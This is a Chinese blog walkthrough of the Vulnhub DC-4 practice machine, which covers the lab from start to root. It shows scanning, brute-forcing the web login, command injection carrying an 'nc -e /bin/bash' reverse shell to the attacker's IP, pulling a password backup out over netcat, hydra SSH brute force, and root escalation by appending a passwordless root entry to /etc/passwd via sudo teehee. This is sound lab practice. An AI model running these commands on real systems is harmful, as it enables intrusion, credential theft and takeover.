DC-4靶机渗透实战

已于 2023-10-15 16:15:59 修改
阅读量83 收藏 1
点赞数 3
文章标签: 笔记
于 2023-10-14 23:00:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74545038/article/details/133833576
版权

DC-4

信息收集

#主机发现

namp -sP 192.168.43.0/24 
arp-scan -l 

#端口探测,服务识别

nmap -sV -p- 192.168.43.7


22,80

#指纹识别

whatweb -v http://192.168.43.7/

#目录扫描

dirsearch -u http://192.168.43.7/ -e php

 

没什么用

#访问80端口

一个登录框,提示admin........

#BP抓包爆破-登录界面可以RCE

爆破出账户为admin/happy

whoami:www-data ---低权限

#反弹shell

nc -lvnp 8888 BP:nc+-e+/bin/bash+192.168.43.33+8888

 

经过抓包得到:空格 就是 +

#低权限交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

信息搜集一波,/home下有三个账户,只有jim有东西 

#尝试提权

/home/jim

存在三个文件 mbox无权限访问

SUID提权:无果

find / -user root -perm -4000 -print 2\>/dev/null

find / -perm -u\=s -type f 2\>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

-----------提权忘了又复习一边-----------GPT给的解释-------------------------------------

find: 这是Linux系统中用于查找文件和目录的命令。

/: 这是find命令的起始路径,从根目录开始进行搜索 -user root: find命令的一个条件,表示要查找属主为 root的文件。

-perm -4000: find命令的另一个条件,表示要查找具有SUID权限(权限设置为4xxx)的文件。

-print: find命令的一个动作,表示将符合条件的文件路径输出到标准输出(stdout) 2\>/dev/null: 这是将错误输出(stderr)重定向到/dev/null,即将错误信息丢弃,不显示在终端上。

-type f: 文件类型为f

exec ls -ldb {}\; 这是 -exec 选项的一部分,用于标记命令的结束。

/home/jim 存在old-passwords.bak文件 保存至本地

#博主实在萌萌人,scp传不了文件,有大佬能解释下为什么吗

scp /home/jim/backups/old-passwords.bak 192.168.43.33:/home/kali

把old-passwords.bak传出来 ----利用nc

kali

nc -lvnp 2334 > old-passwords.txt

靶机

nc 192.168.43.33 2334 < jim/backups/old-passwords.bak

#ssh爆破登录jim

hydra -l jim -P /home/kali/old-passwords.txt 192.168.43.7 ssh -vV

得到密码:jibril04

​​ssh登录jim​

ssh jim@192.168.43.7

#注意提示:You have mail 

查看mbox cat mbox ---一封text邮箱

cat /var/mail --------得到charles的密码:^xHhA&hvim0y

#登录charles

su charles

#提权

切换用户,sudo -l发现提示:teehee命令可无密码以root权限执行

sudo -l

-Matching Defaults entries for charles on dc-4: - env\_reset, mail\_badpass,

- secure\_path\=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

-User charles may run the following commands on dc-4:

- (root) NOPASSWD: /usr/bin/teehee

echo "test1::0:0:root:/root:/bin/bash"|sudo teehee -a /etc/passwd

you have mail --------!

#cat  /root/flag.txt

别野加奈176
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
Vulnhub靶机渗透测试–DC-4靶机渗透实战
御七彩虹猫
10-09 1472
写了WP在个人博客 https://www.takagisan.top/index.php/2021/10/09/vulnhub%e9%9d%b6%e6%9c%ba%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95-dc-4%e9%9d%b6%e6%9c%ba%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/
dc-4 靶机渗透学习
..
03-19 3028
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
dc-3 靶机渗透学习
..
03-17 3510
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误。 vim /etc/network/interfacers 改成 vim /etc/network/interfaces Vulnhub靶机检测不到IP地址_阿帅start的博客-CSDN博客_靶机没有ip 信息收集 使用nmap对当前网段进行扫描 nmap -sP 192.168.202.0/24 在排除kali攻击机和物理机ip后,对192.168.2...
DC-5靶机渗透详细步骤
wwxxss
10-18 686
DC5渗透测试
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1051
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
dc-1 靶机渗透学习
..
03-11 3116
环境: Vmware 虚拟机软件 dc -1 靶机ip地址:192.168.202.130 kali攻击机ip地址:192.168.202.129 本次渗透过程kali攻击机和dc靶机都采取NAT模式 信息收集 首先用ipconfig查看当前kali机所处网段。 得到当前kali机的ip地址后,用nmap对当前网段进行扫描,主机探活。 nmap超详细使用教程_Kris__zhang的博客-CSDN博客_nmap使用教程 nmap -sP 192.168.202.0/24 .
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1437
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 765
DC-6靶机详细渗透过程
DC-1靶机渗透复现(详细教程)
hqhhhh的博客
10-09 263
DC-1靶机渗透实战教学,非常详细!包学包会
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
【UE5.3】笔记6-第一个简单小游戏
最新发布
qq_35064654的博客
06-28 259
在关卡中放置一个cube,放这地面上,将其转换成蓝图类,改名BP_Cube,更换砖块的贴图,按住alt键进行拷贝,堆出一面墙,复制出来的会很多,全选移动到一个新建的文件夹里进行分类放置。这里转换成蓝图类的好处就是后面要修改这面墙的材质就不需要一个个去修改,只要在蓝图类里进行修改就行。注意要打开模拟物理。
操作系统实训复习笔记(2)
m0_74363339的博客
06-24 636
本篇博客的主要内容就是作者本人期末操作系统实训的复习的笔记。包括:Linux 常用命令介绍、Linux文件操作之创建文件,删除文件、Linux 查询命令帮助语句等等以及fork()函数创建进程、进程创建——vfork()函数和进程的终止(注册进程终止函数)等等...
今日AI提示词|新媒体运营场景-小红薯笔记通用指令
Leo-Fighting的博客
06-24 139
此次的输出结果中,配图URL是无效的,可以参考配图建议,自行搭配合适的配图。代入自己的具体场景,改写提示词,应用到实际工作中。多次迭代优化,给出详细的要求。尽量不要直接复制粘贴,
【前端项目笔记】5 分类管理
C_greenbird的博客
06-25 690
在添加分类时,未选择父级分类,则默认添加的分类是一级分类,若选择了父级分类,那么新添加的分类器父级分类id和等级都要随之更新。将当前分支保存到云端origin命名为goods_cate(带不带-u根据云端是否存在当前分支)Cascader 级联选择器:当一个数据集合有清晰的层级结构时,可通过级联选择器逐级查看并选择。git命令回顾(先本地后云端commit->push,先分支后主线merge)此时本地分支goods_cate已最新,云端分支还是旧的。此时本地master已最新,但是云端还是旧的。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值